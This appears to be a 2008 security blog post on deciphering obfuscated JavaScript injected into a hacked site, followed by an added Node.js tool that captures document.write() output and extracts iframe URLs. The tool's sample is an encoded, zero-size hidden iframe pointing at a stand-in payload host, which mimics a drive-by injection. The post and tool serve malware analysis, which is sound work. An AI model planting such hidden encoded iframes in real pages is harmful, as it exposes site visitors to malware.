StellarTech Blog

Deciphering Obfuscated JavaScript

by Glen on Dec. 24, 2008

I had a client who needed me to verify if a site he was hosting had indeed been hacked. The site had several obfuscated lines of JavaScript throughout most if not all of the pages of the site.

I was able to confirm the site was compromised without running the code on a VM or chancing with NoScript on my machine by replacing all document.write() calls with alert().

Just as expected, there was a nice iframe. Using wget I then confirmed that the iframe redirected to another iframe which redirected to a payload. The same network delivering the payload had also uploaded the modified files via FTP a few days earlier.

Since I found no cracking attempts on the site’s FTP account, I’m thinking the client’s client machine is part of the happy botnet.

This is the first time I’ve run into an encrypted iframe and thought it was interesting.
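
The document.write() substitution described above, as an added example that is not part of the original post: instead of alert(), a recording function stands in for document.write() under Node.js, and the iframe targets are pulled from what the script tried to write. The sample script, the host name and the names captureWrites and extractIframes are constructed for illustration.

```javascript
const vm = require('node:vm');

// Constructed sample (not from the compromised site): a percent-encoded hidden
// iframe, pointing at a reserved .invalid host, emitted via document.write().
const SAMPLE = 'document.write(unescape("%3Ciframe%20src%3D%22http%3A//' +
  'payload.example.invalid/in.php%22%20width%3D%220%22%20height%3D%220%22' +
  '%3E%3C/iframe%3E"));';

// Run the script with document.write()/writeln() swapped for a recorder, the
// same idea as swapping in alert(). No window, DOM or network is provided.
// node:vm is not a security boundary, so use a disposable analysis machine.
function captureWrites(source, timeoutMs = 1000) {
  const chunks = [];
  const record = (...parts) => { chunks.push(parts.map(String).join('')); };
  const sandbox = { document: { write: record, writeln: record } };
  let error = null;
  try {
    vm.runInNewContext(source, sandbox, { timeout: timeoutMs });
  } catch (err) {
    // Obfuscated code often touches browser globals that do not exist here;
    // keep whatever was written before it stopped.
    error = String(err && err.message);
  }
  return { html: chunks.join(''), error };
}

// Pull the src of every iframe out of the captured markup.
function extractIframes(html) {
  const re = /<iframe\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const urls = [];
  let m;
  while ((m = re.exec(html)) !== null) urls.push(m[1] ?? m[2] ?? m[3]);
  return urls;
}

const result = captureWrites(SAMPLE);
console.log(result.html);
console.log(extractIframes(result.html));
```
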
